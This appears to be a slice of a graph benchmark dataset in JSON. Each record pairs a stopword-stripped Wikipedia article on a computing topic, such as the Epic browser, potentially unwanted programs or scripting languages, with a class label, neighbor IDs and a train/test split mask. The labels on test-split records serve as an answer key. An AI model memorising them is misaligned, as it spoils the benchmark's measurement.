      9131
    ],
    "mask": "None"
  },
  {
    "node_id": 9770,
    "label": 5,
    "text": "Epic_(web_browser):epic web browser epic privacy-centric web browser developed hidden reflex software product company founded alok bhardwaj based washington dc bangalore india chromium source code epic always private browsing mode exiting browser causes browsing data deleted even browsing little possible stored epic developers remove google tracking code binaries chromium source code compile clean executable blocks companies tracking users browser connection electronic privacy information center civil liberties group also known epic epic released august 29 2013 customized indian users browser integrated widgets social networking chat clients email facilities epic default configuration takes proactive approach ensuring session data cookies history cache removed upon exit browser includes proxy service enabled user discretion automatically enabled using search engine features preferring ssl connections always sending track header advance privacy however many implementations extension based part core browser code epic browser extension based feature implementation allow users extract import extensions chromium based browsers chrome extension developer mode ad user activity trackers blocked default epic browser prevents user tracking occur browser also blocks cryptocurrency miners running users system browsers fingerprinting protection blocks access image canvas font canvas audio context data webrtc ip address leaking blocked default well epic proxy service relay connections user 8 countries including united states united kingdom canada germany france netherlands india singapore company claims encrypted routes dns requests well supplementary services found chromium browser send data external servers address bar suggestion installation tracking removed epic reduce scope potential data leakage epic supports windows 7 later mac os x list web browsers",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      10791,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      6231,
      8281,
      6747,
      1642,
      9834,
      9841,
      115,
      9843,
      4728,
      637,
      1664,
      2182,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      8443,
      9987,
      7943,
      278,
      7965,
      2339,
      1834,
      7983,
      10057,
      11082,
      2893,
      8557,
      6528,
      3971,
      3462,
      8584,
      7572,
      5026,
      944,
      5054,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114
    ],
    "mask": "Test"
  },
  {
    "node_id": 9771,
    "label": 4,
    "text": "Potentially_unwanted_program:potentially unwanted program potentially unwanted program pup potentially unwanted application pua software user may perceive unwanted used subjective tagging criterion security parental control products software may use implementation compromise privacy weaken computer security companies often bundle wanted program download wrapper application may offer install unwanted application cases without providing clear opt-out method antivirus companies define software bundled potentially unwanted programs include software displays intrusive advertising adware tracks user internet usage sell information advertisers spyware injects advertising web pages user looks uses premium sms services rack charges user practice widely considered unethical violates security interests users without informed consent unwanted software bundles install root certificate user device allows hackers intercept private data banking details without browser giving security warnings united states department homeland security advised removing insecure root certificate make computers vulnerable serious cyberattacks growing number open-source software projects expressed dismay third-party websites wrapping downloads unwanted bundles without project knowledge consent nearly every third-party free download site bundles downloads potentially unwanted software software developers security experts recommend people always download latest version official project website trusted package manager app store historically first big companies working potentially unwanted programs creating revenue came usa mid-2000s zango activities declined companies investigated cases indicted authorities invasive harmful installs major industry dedicated creating revenue foisting potentially unwanted programs grown among israeli software industry frequently referred download valley companies responsible large part download install tools place unwanted additional software users systems unwanted programs increased recent years one study 2014 classified unwanted programs comprising 24.77 total malware infections malware includes adware according google many programs include unwanted browser add-ons track websites user goes order sell information advertisers add advertising web pages five percent computer browser visits google-owned websites altered computer programs inject ads pages researchers identified 50,870 google chrome extensions 34,407 programs inject ads thirty-eight percent extensions 17 percent programs catalogued malicious software rest potentially unwanted adware-type applications google chrome extension developers sold extensions made third-party companies silently push unwanted updates incorporate previously non-existent adware extensions spyware programs install proxy server person computer monitors web traffic passing tracking user interests build profile sell profile advertisers superfish advertising injector creates root certificate computer operating system allowing tool inject advertising encrypted google search pages track history user search queries february 2015 united states department homeland security advised uninstalling superfish associated root certificate lenovo computers make computers vulnerable serious cyberattacks including interception passwords sensitive data transmitted browsers heise security revealed superfish certificate included bundled downloads number applications companies including say media lavasoft ad-aware web companion many companies use browser hijacking modify user home page search page force internet hits particular website make money advertisers companies steal cookies user browser hijacking connections websites logged performing actions using account without user knowledge consent like installing android apps users dial-up internet access use modems computer connect internet targeted fraudulent applications used security holes operating system dial premium numbers many android devices targeted malware use premium sms services rack charges users 2015 research emsisoft suggested free download providers bundled downloads potentially unwanted software download.com worst offender lowell heddings expressed dismay sadly even google top results open source freeware ads really terrible sites bundling crapware adware malware top installer december 2011 gordon lyon published strong dislike way download.com started bundling grayware installation managers concerns bundled software causing many people spread post social networks dozen media reports main problem confusion download.com-offered content software offered original authors accusations included deception well copyright trademark violation 2014 register us-cert warned via download.com foistware attacker may able download execute arbitrary code many open-source software developers expressed frustration dismay work packaged companies profit work using search advertising occupy first result search page increasingly pages offering bundled installers include unwanted software confuse users presenting bundled software official download page endorsed open source project early 2016 longer case ownership sourceforge transferred sourceforge media llc subsidiary bizx llc bizx sale removed devshare program means bundled installers longer available november 2013 gimp free image manipulation program removed download sourceforge citing misleading download buttons potentially confuse customers well sourceforge windows installer bundles third-party offers statement gimp called sourceforge useful trustworthy place develop host floss applications faces problem ads allow sites ... may 2015 gimp windows sourceforge project transferred ownership sourceforge editorial staff account adware downloads re-enabled happened developers nmap may 2015 sourceforge took control projects migrated hosting sites replaced project downloads adware-laden downloads gordon lyon lost control nmap sourceforge page sourceforge taking project page lyon stated far seem providing official nmap files long n't click fake download buttons n't caught trojaning nmap way gimp certainly n't trust one bit sourceforge pulling scheme cnet download.com tried back started circling drain videolan expressed dismay users searching product see search advertising websites offer bundled downloads include unwanted programs videolan lacks resources sue many companies abusing trademarks",
    "neighbors": [
      3072,
      3969,
      6786,
      11266,
      7044,
      10245,
      510,
      9351,
      10756,
      3595,
      9356,
      5261,
      9233,
      8978,
      4863,
      4883,
      5245,
      278,
      1046,
      10392,
      4889,
      1690,
      2075,
      3867,
      10141,
      5281,
      2213,
      8998,
      9256,
      939,
      9771,
      4013,
      5935,
      2864,
      7983,
      1970,
      2739,
      4403,
      4659,
      5887,
      4023,
      6454,
      3643,
      6588,
      7739,
      9791,
      1088,
      7362,
      3395,
      8387,
      4165,
      5067,
      2508,
      9803,
      4689,
      467,
      10710,
      87,
      11225,
      7515,
      4344,
      3941,
      8805,
      106,
      107,
      877,
      6382,
      4081,
      4725,
      3320,
      2041,
      4605,
      2558,
      1279
    ],
    "mask": "None"
  },
  {
    "node_id": 9772,
    "label": 7,
    "text": "G.ho.st:g.ho.st g.ho.st usually pronounced ghost trading name ghost inc. service name url company hosted computer operating system web desktop service name acronym global hosted operating system old url g.ho.st domain hack using são tomé príncipe .st country extension april 2010 ghost closed service due competition lack funding g.ho.st service provided web-based working environment mimicked classic desktop provided personal computer operating systems users able create save return working environment different physical computers mobile phones g.ho.st called virtual computer services considered operating systems traditional sense although sometimes referred web operating systems whilst include gui e.g desktop virtual file system application management security contain kernel interface physical hardware therefore use service operating system required supporting least web browser service run july 2009 software entered beta stage development remained stage beta launch near jerusalem attended quartet representative former uk prime minister tony blair company primary investor benchmark capital g.ho.st hosted amazon web services utilizing cloud computing backend delivering consumer version cloud computing according g.ho.st website longer accessible planned additionally offer commercial fully featured scalable private cloud file system ghost cloud file system cfs would run within customer amazon web services account business model would based surcharges ghost collected amazon company received growing press coverage relating technology israelis palestinians worked partners build company products time considered joint palestinian israeli technology startup company first company offer employee stock options palestinian territories march 3 2010 ghost.cc formed g.ho.st sent users following e-mail dear ghost user hope enjoying free ghost service regrettably changes marketplace mean longer economical us host ghost service closing service around march 15 instead focusing licensing selling technology larger companies advise migrate important folders files emails another secure place march 15 might like consider google docs microsoft skydrive files services gmail yahoo mail email instructions migrating data included really sorry inconvenience may cause grateful fantastic support community similar services",
    "neighbors": [
      2945,
      4194,
      7364,
      3690,
      7248,
      3833
    ],
    "mask": "Test"
  },
  {
    "node_id": 9773,
    "label": 3,
    "text": "Fire_Hawk:_Thexder_-_The_Second_Contact:fire hawk thexder second contact fire hawk thexder second contact テグザー2 ファイアーホーク also known firehawk thexder 2 firehawk thexder ii video game developed published game arts msx2 ms-dos pc-8801 1989 sequel thexder japan ms-dos version later released sierra on-line one predicted furious arcade action high-resolution graphics 11 complete songs ... thexder ii looks set surpass success original game indeed well received upon release sold well japan usa",
    "neighbors": [
      9166,
      9703
    ],
    "mask": "Test"
  },
  {
    "node_id": 9774,
    "label": 3,
    "text": "Project_Denver:project denver project denver codename microarchitecture designed nvidia implements armv8-a 64/32-bit instruction sets using combination simple hardware decoder software-based binary translation dynamic recompilation denver binary translation layer runs software lower level operating system stores commonly accessed already optimized code sequences 128 mb cache stored main memory denver wide in-order superscalar pipeline design makes suitable integration sips cores e.g gpu display controller dsp image processor etc one die constituting system chip soc project denver targeted mobile computers personal computers servers well supercomputers respective cores found integration tegra soc series nvidia initially denver cores available 28nm structure sizes tegra model t132 aka tegra k1 later updated denver 2 design worked 16nm structure sizes tegra model t186 aka tegra x2 2018 got published refined follow design codename carmel based armv8 64-bit variant arm-v8.2 10-way superscalar functional safety dual execution parity ecc got integrated tegra xavier soc offering total 8 cores 4 dual-core pairs carmel cpu core supports full advanced simd arm neon vfp vector floating point armv8.2-fp16 first published testings carmel cores integrated jetson agx development kit third party experts took place september 2018 indicated noticeably increased performance expected real world physical manifestation compared predecessors systems despite doubts used quickness test setup general particular implies carmel design found tegra model t194 tegra xavier designed 12 nm structure size dual-core denver cpu paired kepler-based gpu solution form tegra k1 dual-core 2.3 ghz denver-based k1 first used htc nexus 9 tablet released november 3 2014 note however quad-core tegra k1 using name n't based denver nvidia tegra x2 two denver2 armv8 64bit cores inside another four a57 armv8 64bit cores using coherent hmp heterogeneous multi-processor architecture approach pairs units parker-gpu tegra xavier pairing nvidia volta-gpu several special purpose accelerators 8 cpu cores carmel design design 4 carmel asic macro blocks 2 cores matched one crossbar 4 mib l3 memory existence project denver revealed 2011 consumer electronics show march 4 2011 q article ceo jen-hsun huang revealed project denver five-year 64-bit armv8-a architecture cpu development hundreds engineers already worked three half years also 32-bit arm instruction set armv7 backward compatibility project denver started stexar company colorado x86-compatible processor using binary translation similar projects transmeta stexar acquired nvidia 2006 according tom hardware engineers intel amd hp sun transmeta denver team extensive experience designing superscalar cpus out-of-order execution long instruction words vliw simultaneous multithreading smt according charlie demerjian project denver cpu may internally translate arm instructions internal instruction set using firmware cpu also according demerjian project denver originally intended support arm x86 code using code morphing technology transmeta changed armv8-a 64-bit instruction set nvidia could obtain license intel patents first consumer device shipping denver cpu cores google nexus 9 announced october 15 2014 tablet manufactured htc features dual-core tegra k1 soc nexus 9 also first 64-bit android device available consumers",
    "neighbors": [
      3585,
      4112,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      2097,
      7218,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      10361,
      638,
      3203,
      644,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      6815,
      4258,
      6818,
      9913,
      8383,
      10945,
      196,
      4821,
      2788,
      2277,
      8937,
      9964,
      1776,
      6900,
      6391,
      3835,
      2814,
      7941,
      5384,
      781,
      6926,
      9489,
      5417,
      2862,
      7988,
      11062,
      6971,
      8514,
      8003,
      10562,
      6981,
      5963,
      1871,
      1872,
      2388,
      6495,
      1377,
      11629,
      11630,
      6001,
      373,
      2937,
      392,
      398,
      1428,
      4508,
      10658,
      7077,
      9638,
      7086,
      10675,
      9665,
      9155,
      7111,
      1480,
      9163,
      7631,
      6608,
      980,
      9174,
      10199,
      2524,
      2525,
      9182,
      10734,
      499,
      1014,
      3575
    ],
    "mask": "None"
  },
  {
    "node_id": 9775,
    "label": 4,
    "text": "Péter_Szőr:péter szőr péter szőr 17 july 1970 – 12 november 2013 hungarian computer virus security researcher entrepreneur author born balatonfüred veszprém county szőr began interest computer viruses 1990 university pannonia graduate authored several virus-related books renowned work 2009 death worked mcafee antivirus firm working new solution stop viruses early 2004 péter szőr son daniel szőr spouse natalia nemeth may 2014 virus bulletin introduced péter szőr award given annually recognition best piece technical security research done year péter szőr died 12 november 2013 aged 43",
    "neighbors": [
      704,
      5760,
      131,
      2213,
      4441,
      7739
    ],
    "mask": "None"
  },
  {
    "node_id": 9776,
    "label": 9,
    "text": "DOORS_Extension_Language:doors extension language doors extension language dxl scripting language used extend functionality ibm rational doors programming language somewhat similar c c++ language specific doors syntax declaration forum discuss development addition specific reference manuals dxl scripts utilized help users doors much native doors gui written dxl dxl used client-server based doors classic used newer web-based doors next generation several ways use dxl rational doors dxl scripts usually stored extension dxl however use library files extension .inc print hello world following code used print hello world sodius dxl editor built top eclipse one tool provides option edit browse compile execute debug dxl scripts many open source free editors like notepad++ jedit support dxl custom properties",
    "neighbors": [
      3323,
      9780,
      2045,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 9777,
    "label": 3,
    "text": "Input/output_base_address:input/output base address x86 architecture input/output base address first address range consecutive read/write addresses device uses x86 io bus base address sometimes called i/o port",
    "neighbors": [
      6129,
      2226,
      4581
    ],
    "mask": "Train"
  },
  {
    "node_id": 9778,
    "label": 2,
    "text": "Andy_Hertzfeld:andy hertzfeld andy hertzfeld born april 6 1953 american computer scientist inventor member original apple macintosh development team 1980s buying apple ii january 1978 went work apple computer august 1979 march 1984 designer macintosh system software since leaving apple co-founded three companies radius 1986 general magic 1990 eazel 1999 2002 helped mitch kapor promote open source software open source applications foundation hertzfeld worked google 2005 2013 2011 key designer circles user interface google+ graduating brown university computer science degree 1975 hertzfeld attended graduate school university california berkeley 1978 bought apple ii computer soon began developing software hired apple computer systems programmer 1979 developed apple silentype printer firmware wrote firmware sup r'terminal first 80-column card apple ii early 1980s invited high school friend artist susan kare join apple order help design would become standard macintosh icons first macintosh hertzfeld wrote icon editor font editor susan kare could design symbols used operating system hertzfeld member apple macintosh design team shakeup apple ii team hertzfeld request apple co-founder steve jobs added nearly two-year-old macintosh team february 1981 working bud tribble alongside bill atkinson burrell smith hertzfeld became primary software architect macintosh operating system considered revolutionary use graphical user interface gui jef raskin also made contributions hertzfeld business card apple listed title software wizard wrote large portions macintosh original system software including much rom code user interface toolbox number innovative components standard many graphic user interfaces like control panel scrapbook hertzfeld book revolution valley insanely great story mac made chronicles development macintosh launch since leaving apple 1984 hertzfeld co-founded three new companies – radius 1986 general magic 1990 eazel 1999 eazel helped create nautilus file manager linux gnome desktop volunteered open source applications foundation 2002 2003 writing early prototypes chandler information manager 1996 hertzfeld interviewed robert cringely television documentary triumph nerds interviewed cringely nerdtv 2005 early 2004 started folklore.org web site devoted collective storytelling contains dozens anecdotes development original macintosh stories collected o'reilly book revolution valley published december 2004 august 2005 hertzfeld joined google june 28 2011 google announced google+ latest attempt social networking hertzfeld key designer google+ circles component user interface entire project mistakenly claimed also worked picasa gmail profile image selector retired google july 2013 october 2018 investor startup spatial hertzfeld portrayed elden henson 2013 film jobs michael stuhlbarg 2015 film steve jobs steve jobs film herztfeld stated almost nothing like really happened ultimately said film n't aiming realism hertzfeld wife live palo alto california",
    "neighbors": [
      9999,
      4114,
      10386,
      6554,
      4251,
      9123,
      11171,
      823,
      1592,
      576,
      8021,
      6234,
      8540,
      4194,
      9700,
      2282,
      1389,
      11118,
      2160,
      5619,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 9779,
    "label": 5,
    "text": "Internet_0:internet 0 internet 0 low-speed physical layer designed route 'ip anything developed mit center bits atoms neil gershenfeld raffi krikorian danny cohen invented number proposals labelled internet 2 name chosen emphasize designed slow inexpensive internetworking system forestall high-performance comparison questions fast effectively would enable platform pervasive computing -- everything building could network share data gathering actuation light switch could turn light bulb sending packet linked together user internet 0 originally minor expedient bit engineering support mit projects intended network buildings improve efficiency gather data control hvac systems heating ventilation air conditioning protocol works pretty well wide variety media wide utility multiple media protocol interested network theorists awakened burst academic papers started commercial interest simple inexpensive implementation still appeals hobbyists students new implementations found 2011 modern implementations mostly software small microcontrollers usually transistor transmit capacitors isolate transmitter receiver connector literally becomes major expense communication system simple inexpensive system embedded many devices allow data retrieval control via internet -- small devices used form internet things current largest deployment internet 0 venice biennale architecture exhibition year 2008 group led institute advanced architecture catalonia directed architect vicente guallart idea behind internet 0 provide general-purpose physical layer operates well many media similar morse code general-purpose layer 1 internet logically recursive application internet principle ubiquitous protocol layer 1 network pulse-position modulation internet 0 operates best segregated wire works many media tested radio frequency rf infrared ir ultrasonics optical dc ac power wiring even physical representations printed bar codes engraving key one main advantages approach routers become simple sensor pulse reshaper transmitter coupling reusable physical layer internet protocols enables network inexpensive nodes also addressable global internet design intent provide simple inexpensive system transmit data slowly many types media yet still connect devices internet connecting internet crucial part design much value networked device provided easy wide access higher layers internet 0 network usually serial line internet protocol slip internet protocol ip usually user datagram protocol udp rarely transmission control protocol tcp protocol layers chosen need minimum code keep expense computer low internet 0 implemented small avr microcontrollers existing implementations layers distinct small code important elegant design small translation device normally attaches local network internet 0 devices serial port pc acts gateway firewall internet devices talk directly without requiring server distributed architecture ensures central point failure address assignment cryptographic key initialization sometimes performed closing contact device master controller broadcast assignment message security via simplified encryption system internet 0 similar serial port running 9600 baud except sends data pulse-position modulation accepts 30 timing deviations medium broadcast half duplex software receiving devices examines ip address packet rejecting unwanted packets zero bit one-microsecond pulse center first half bit time one pulse second half bit time data sent 8 bit bytes byte preceded bit time two pulses 1 0 times ends bit time another two pulses variations stop bit-time optional dual-pulse bit times treated byte separators dual-pulse start stop bit times permit receiver synchronize beginnings bytes also measure baud rate sender synchronizing 8-bit bytes permits 9600 baud internet-0 connection easily translate standard low-speed 19,200 baud tcp/ip serial port baud rate measurement permits senders receivers use inexpensive low-precision oscillators ceramic resonators resistor-capacitor oscillators common interface uses power supply wiring device circuit small surface mounted capacitor ac mains wire dc power wire single digital pin small microcontroller switches high-power transistor briefly pulses normally generated software toggle digital i/o pin microcontroller received another capacitor microcontroller pin configured interrupt hardware timer gate internet 0 works many media given transmission medium usually competing preexisting physical layers reliable higher speed lower power usually flexible rarely inexpensive less surprising early exploration concept sun microsystems cisco systems schneider electric interested commercial deployment schneider eventually decided deploy zigbee low-powered radio protocol",
    "neighbors": [
      5472,
      9665,
      8098,
      4995,
      4964,
      11267,
      1030,
      8998,
      682,
      10924,
      6834,
      11413,
      1849,
      154
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9780,
    "label": 9,
    "text": "Scripting_language:scripting language scripting script language programming language special run-time environment automates execution tasks tasks could alternatively executed one-by-one human operator scripting languages often interpreted rather compiled primitives usually elementary tasks api calls language allows combined programs environments automated scripting include software applications web pages within web browser usage shells operating systems os embedded systems well numerous games scripting language viewed domain-specific language particular environment case scripting application also known extension language scripting languages also sometimes referred high-level programming languages operate high level abstraction control languages particularly job control languages mainframes term scripting language also used loosely refer dynamic high-level general-purpose languages perl powershell python tcl term script often used small programs thousand lines code languages domain-specific languages text-processing languages sed awk languages originally developed use within particular environment later developed portable domain-specific general-purpose languages conversely many general-purpose languages dialects used scripting languages article discusses scripting languages narrow sense languages specific environment spectrum scripting languages ranges small highly domain-specific languages general-purpose programming languages used scripting standard examples scripting languages specific environments include bash unix unix-like operating systems ecmascript javascript web browsers visual basic applications microsoft office applications lua language designed widely used extension language python general-purpose language also commonly used extension language ecmascript still primarily scripting language web browsers also used general-purpose language emacs lisp dialect lisp emacs editor visual basic applications dialect visual basic examples scripting language dialects general-purpose languages game systems notably second life virtual world trainz franchise railroad simulators extensively extended functionality scripting extensions linden scripting language trainzscript games like wesnoth variety actual games played players scripts written users typical scripting languages intended fast learn write either short source code files interactively read–eval–print loop repl language shell generally implies relatively simple syntax semantics typically script code written scripting language executed start finish script explicit entry point example uncommon characterise java scripting language lengthy syntax rules classes exist files directly possible execute java interactively source files contain definitions must invoked externally host application application launcher public class helloworld piece code intended print hello world nothing main declared helloworld class contrast python allows definition functions single file avoid functions altogether use imperative programming style even use interactively codice_1 one line python code prints hello world declarative statement like main required scripting language usually interpreted source code bytecode contrast software environment scripts written typically written compiled language distributed machine code form scripting languages may designed use end users program—end-user development—or may internal use developers write portions program scripting language scripting languages typically use abstraction form information hiding spare users details internal variable types data storage memory management scripts often created modified person executing also often distributed large portions games written scripting language early mainframe computers 1950s non-interactive instead using batch processing ibm job control language jcl archetype languages used control batch processing first interactive shells developed 1960s enable remote operation first time-sharing systems used shell scripts controlled running computer programs within computer program shell calvin mooers trac language generally credited inventing command substitution ability embed commands scripts interpreted insert character string script multics calls active functions louis pouzin wrote early processor command scripts called runcom ctss around 1964 stuart madnick mit wrote scripting language ibm cp/cms 1966 originally called processor command later named exec multics included offshoot ctss runcom also called runcom exec eventually replaced exec 2 rexx languages tcl lua specifically designed general-purpose scripting languages could embedded application languages visual basic applications vba provided strong integration automation facilities underlying system embedding general-purpose scripting languages instead developing new language application also obvious benefits relieving application developer need code language translator scratch allowing user apply skills learned elsewhere software incorporates several different scripting languages modern web browsers typically provide language writing extensions browser several standard embedded languages controlling browser including javascript dialect ecmascript xul scripting often contrasted system programming ousterhout dichotomy programming large programming small view scripting particularly glue code connecting software components language specialized purpose glue language pipelines shell scripting archetypal examples glue languages perl initially developed fill role web development considered use glue languages interfacing database web server substantial amount logic written script better characterized simply another software component glue glue languages especially useful writing maintaining glue language examples macro languages exposed operating system application components serve glue languages include visual basic applications wordbasic lotusscript corelscript hummingbird basic quickscript saxbasic winwrap basic tools like awk also considered glue languages language implemented windows script host engine vbscript jscript vba default windows third-party engines including implementations rexx perl tcl python xslt ruby modern pascal delphi c majority applications access use operating system components via object models functions devices like programmable calculators may also glue languages operating systems pdas windows ce may available native third-party macro tools glue applications together addition implementations common glue languages—including windows nt ms-dos unix shells rexx modern pascal php perl depending upon os version wsh default script engines vbscript jscript available programmable calculators programmed glue languages three ways example texas instruments ti-92 factory default programmed command script language inclusion scripting glue language lua ti-nspire series calculators could seen successor primary on-board high-level programming languages graphing calculators often basic variants sometimes lisp derivatives uncommonly c derivatives many cases glue together calculator functions—such graphs lists matrices etc third-party implementations comprehensive basic version may closer variants listed glue languages article available—and attempts implement perl rexx various operating system shells ti hp graphing calculators also mentioned pc-based c cross-compilers ti hp machines used conjunction tools convert c perl rexx awk well shell scripts perl modern pascal vbscript perl make possible write program glue language eventual implementation compiled program calculator major class scripting languages grown automation job control relates starting controlling behavior system programs sense one might think shells descendants ibm jcl job control language used exactly purpose many languages interpreters double command-line interpreters unix shell ms-dos codice_2 others applescript offer use english-like commands build scripts advent graphical user interfaces specialized kind scripting language emerged controlling computer languages interact graphic windows menus buttons human user would simulating actions user languages typically used automate user actions languages also called macros control simulated key presses mouse clicks well tapping pressing touch-activated screen languages could principle used control gui application practice use limited use needs support application operating system exceptions limitation gui scripting languages based recognizing graphical objects display screen pixels gui scripting languages depend support operating system application application specific languages split many different categories i.e standalone based app languages executable internal application specific languages postscript xml gscript widely distributed scripts respectively implemented adobe ms google among others include idiomatic scripting language tailored needs application user likewise many computer game systems use custom scripting language express programmed actions non-player characters game environment languages sort designed single application may superficially resemble specific general-purpose language e.g quakec modeled c custom features distinguish emacs lisp fully formed capable dialect lisp contains many special features make useful extending editing functions emacs application-specific scripting language viewed domain-specific programming language specialized single application number languages designed purpose replacing application-specific scripting languages embeddable application programs application programmer working c another systems language includes hooks scripting language control application languages may technically equivalent application-specific extension language application embeds common language user gets advantage able transfer skills application application generic alternative simply provide library often c library general-purpose language use control application without modifying language specific domain javascript began primarily still language scripting inside web browsers however standardisation language ecmascript made popular general-purpose embeddable language particular mozilla implementation spidermonkey embedded several environments yahoo widget engine applications embedding ecmascript implementations include adobe products adobe flash actionscript adobe acrobat scripting pdf files tcl created extension language come used frequently general-purpose language roles similar python perl ruby hand rexx originally created job control language widely used extension language well general-purpose language perl general-purpose language oraperl 1990 dialect consisting perl 4 binary oracle call interface compiled however since replaced library perl module dbd :oracle complex task-oriented applications may incorporate expose embedded programming language allow users control give functionality available user interface matter sophisticated example autodesk maya 3d authoring tools embed mel scripting language blender uses python fill role types applications need faster feature addition tweak-and-run cycles e.g game engines also use embedded language development allows prototype features faster tweak freely without need user intimate knowledge inner workings application rebuild tweak take significant amount time scripting languages used purpose range common famous lua python lesser-known ones angelscript squirrel ch another c compatible scripting option industry embed c/c++ application programs",
    "neighbors": [
      9728,
      5633,
      5634,
      515,
      11269,
      6150,
      9735,
      2568,
      9224,
      1549,
      2062,
      6674,
      5651,
      3604,
      8729,
      1565,
      3613,
      9245,
      544,
      9757,
      8226,
      2599,
      5677,
      5680,
      9776,
      2610,
      6706,
      564,
      7219,
      1591,
      10296,
      7738,
      8251,
      3132,
      6718,
      576,
      6722,
      10819,
      8262,
      2120,
      10824,
      4174,
      8278,
      4186,
      603,
      92,
      3675,
      1632,
      5219,
      9827,
      5222,
      2666,
      1131,
      3692,
      9323,
      1647,
      9330,
      9331,
      6772,
      119,
      10872,
      1145,
      5760,
      9345,
      5250,
      2691,
      2181,
      136,
      6281,
      11403,
      9871,
      10387,
      8340,
      3221,
      8854,
      4248,
      3229,
      7325,
      7840,
      3233,
      4770,
      4771,
      3237,
      5287,
      7847,
      4777,
      6313,
      7343,
      10927,
      11442,
      1203,
      692,
      2739,
      4277,
      7356,
      10428,
      191,
      6847,
      5314,
      3267,
      5316,
      9926,
      6345,
      5324,
      1741,
      5841,
      3285,
      1750,
      3287,
      5845,
      9946,
      219,
      220,
      5343,
      11488,
      225,
      6883,
      7395,
      4838,
      6377,
      4844,
      9454,
      7919,
      10991,
      6396,
      7421,
      6398,
      9981,
      2304,
      4865,
      4354,
      6403,
      7430,
      1799,
      10506,
      2317,
      9997,
      3856,
      5395,
      7444,
      5397,
      11030,
      11541,
      5409,
      9505,
      3876,
      4900,
      806,
      8487,
      808,
      811,
      6958,
      2351,
      7983,
      10033,
      6450,
      6962,
      823,
      4410,
      2364,
      5437,
      11584,
      11075,
      8517,
      1863,
      9034,
      846,
      335,
      847,
      5968,
      338,
      7507,
      10579,
      2901,
      9045,
      7515,
      10593,
      10083,
      356,
      6502,
      4968,
      8041,
      362,
      6506,
      8554,
      11632,
      1393,
      10097,
      5492,
      9078,
      1401,
      4989,
      6016,
      3970,
      3462,
      4486,
      8582,
      10631,
      5515,
      8588,
      4493,
      11150,
      11659,
      8080,
      7061,
      8598,
      5527,
      3481,
      9626,
      11675,
      2975,
      1952,
      4001,
      11683,
      1960,
      5032,
      6056,
      11688,
      7088,
      2481,
      8626,
      8627,
      10672,
      5045,
      5048,
      7608,
      6074,
      11196,
      960,
      10177,
      7106,
      8644,
      4042,
      11218,
      2009,
      477,
      5605,
      10727,
      8168,
      1001,
      4074,
      7147,
      5612,
      8171,
      10732,
      2545,
      2546,
      3569,
      6132,
      8692,
      502,
      9714,
      10744,
      3577,
      11249,
      2556,
      10239
    ],
    "mask": "None"
  },
  {
    "node_id": 9781,
    "label": 4,
    "text": "Retina-X_Studios:retina-x studios retina-x studios software manufacturer company develops computer cell phone monitoring applications focused computers smartphones tablets networks company founded 1997 based jacksonville florida united states company founded july 1997 primarily web consulting design company 2003 period developing monitoring products outside companies company began creating monitoring software products using brand name first software product named acespy released april 28 2003 may 2007 company developed released first monitoring software mobile phones named mobile-spy particularly windows mobile target audiences retina-x studios parents employers parents employers use legal monitoring software check teens staff internet use legal since juveniles responsibility parents company markets products spy applications parents review child messages call details without child knowledge cases ethical issues arise employees made aware monitoring tools personal emails intentionally accessed managers involved directly evaluating contents logging activities be/become biased towards person whose email reviewed using cell phones spying also increased due multiplication smart phones compromising one information possible spy apps people stalk easily company software need onetime access gadget software would run invisibly wrong use software overlooked hackers access online information parsed customer account lead privacy issues",
    "neighbors": [
      8978,
      1083,
      2151
    ],
    "mask": "Test"
  },
  {
    "node_id": 9782,
    "label": 1,
    "text": "Database_scalability:database scalability database scalability ability database handle changing demands adding/removing resources databases adopted host techniques cope initial history database scalability provide service ever smaller computers first database management systems ims ran mainframe computers second generation including ingres informix sybase rdb oracle emerged minicomputers third generation including dbase oracle ran personal computers period attention turned handling data demanding workloads one key software innovation late 1980s reduce update locking granularity tables disk blocks individual rows eliminated critical scalability bottleneck coarser locks could delay access rows even though directly involved transaction earlier systems completely insensitive increasing resources software limitations addressed attention turned hardware innovation occurred many areas first support multiprocessor computers involved allowing multiple processors handle database requests simultaneously without blocking evolved support multi-core processors much significant change involved allowing distributed transactions affect data stored separate computers using two-phase commit protocol establishing shared-nothing architecture still later oracle introduced shared-everything architecture provided full functionality multi-server clusters another innovation storing copies tables multiple computers database replication improved availability processing could continue copy even main system unavailable scalability particularly query/analysis requests could routed copy primary reached capacity early twenty-first century nosql systems gained favor relational databases workloads motivations included still greater scalability support documents non-relational data types often sacrificed strict acid consistency protocols guaranteed perfect consistency times favor eventual consistency ensured nodes would eventually return latest data even allowed transactions occasionally lost long system could handle sufficiently many requests prominent early system google bigtable/mapreduce developed 2004 achieved near-linear scalability across multiple server farms cost features multi-row transactions joins 2007 first newsql system h-store developed newsql systems attempt combine nosql scalability acid transactions sql interfaces database scalability three basic dimensions amount data volume requests size requests requests come many sizes transactions generally affect small amounts data may approach thousands per second analytic queries generally fewer may access data related concept elasticity ability system transparently add subtract capacity meet changing workloads vertical database scaling implies database system fully exploit maximally configured systems including typically multiprocessors large memories vast storage capacity systems relatively simple administer may offer reduced availability however single computer maximum configuration workloads expand beyond limit choices either migrate different still larger system rearchitect system achieve horizontal scalability horizontal database scaling involves adding servers work single workload horizontally scalable systems come functionality compromises application requires functionality migration vertically scaled system may preferable databases run individual hardware ranging capacity smartwatches supercomputers multiple transparently reconfigurable server farms databases also scaled vertically run 64-bit microprocessors multi-core cpus large smp multiprocessors using multi-threaded implementations fully exploiting hardware configuration requires variety locking techniques ranging locking entire database entire tables disk blocks individual table rows appropriate lock granularity depends workload smaller object locked less chance database requests blocking hardware idles typically row locks necessary support high volume transaction processing applications cost processing overhead manage larger number locks systems ensure query sees time-consistent view database locking data query examining prevent update modifying stalling work alternatively databases use multi-version read consistency avoid blocking read locks still providing consistent query results another potential bottleneck occur systems many requests attempt access data time example oltp systems many transactions may attempt insert data table time shared nothing system given moment inserts processed single server manages partition shard table possibly 